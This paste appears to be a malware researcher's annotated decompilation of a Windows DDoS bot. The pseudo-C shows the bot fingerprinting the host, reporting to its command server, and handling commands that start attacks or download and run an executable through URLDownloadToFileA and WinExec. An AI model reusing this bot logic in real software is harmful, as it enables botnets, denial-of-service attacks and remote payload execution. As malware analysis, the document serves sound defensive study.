Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* MalwareMustDie!!
- DDoSTF win32 disassembled, by @unixfreaxjp
- using experimental decompiler for r2 */
- fn.0x40483B()
- {
- result = fn.0x4027FD();
- dword.9x40890C = result;
- if ( result )
- {
- strcpy($Src, var11);
- SleepTrick();
- fn.0x402F9F(); // query HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0
- // for speed & processors
- SleepTrick();
- GetSystemInfo(&SystemInfo); // System information
- SleepTrick();
- SystemInfo.dwNumberOfProcessors; // CPU info
- GetComputerNameA(&Buffer, &nSize); // Hostname
- GetSystemDefaultUILanguage(); // DefaultUILanguage
- SleepTrick();
- strcpy(&var31, "ver 7.0"); //
- SleepTrick();
- *(_DWORD *)buf = 11;
- memcpy(&Dst, &Src, 0xA0);
- SleepTrick();
- if ( send(dword.0x40890C, buf, 520, 0) != -1 )
- {
- while ( 1 )
- {
- readfds.fd_array[0] = dword.0x40890C;
- readfds.fd_count = 1;
- var2 = select(dword.0x40890C + 1, &readfds, 0, 0, 0);
- if ( var2 == -1 )
- break;
- if ( var2 && _WSAFDIsSet(dword.0x40890C, &readfds) )
- {
- var3 = recv(dword.0x40890C, &var12, 388, 0);
- if ( !v3 || var3 == -1 )
- {
- closesocket(dword.0x40890C);
- break;
- }
- memcpy(&var14, &var12, 0x208);
- switch (var15)
- {
- case 5:
- memcpy(&Params, &var16, 0x184);
- fn.0x403F05(&Params); // go to 12 attack cascade switch ala BillGates
- break;
- case 6:
- dword.0x408938 = 0;
- break;
- case 7:
- CmdLine = 0; Source = 0;
- memset(&var19, 0, 0x100);
- var20 = 0; var21 = 0;
- memset(&var23, 0, 0x7C);
- var24 = 0; var25 = 0;
- GetTempPathA(0x104, &CmdLine);
- var4 = fn.0x4022DB(26) + 97;// target assembles here
- var5 = fn.0x4022DB(26) + 97;// target assembles here
- var6 = fn.0x4022DB(26) + 97;// target assembles here
- var7 = fn.0x4022DB(26) + 97;// target assembles here
- var8 = fn.0x4022DB(26);
- wsprintfA(&Source, "\\%c%c%c%c%c.exe", [var8 + 97], var7, var6, var5, var4);
- strcat(&CmdLine, &Source);
- var9 = LoadLibraryA("urlmon.dll");
- var10 = GetProcAddress(v9, "URLDownloadToFileA"); // download payload..
- ((void (__stdcall *)(_DWORD, char *, char *, signed int, _DWORD))v10)(0, &var16, &CmdLine, 10, 0);
- WinExec(&CmdLine, 0); // execute the payload..
- break;
- case 8:
- dword.0x40893C = 0;
- CreateThread(0, 0, fn.0x404659, 0, 0, 0); // threaded process start
- break;
- case 9:
- dword.0x40893C = 1;
- break;
- }
- }
- }
- }
- result = closesocket(dword.0x40890C);
- }
- return result;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement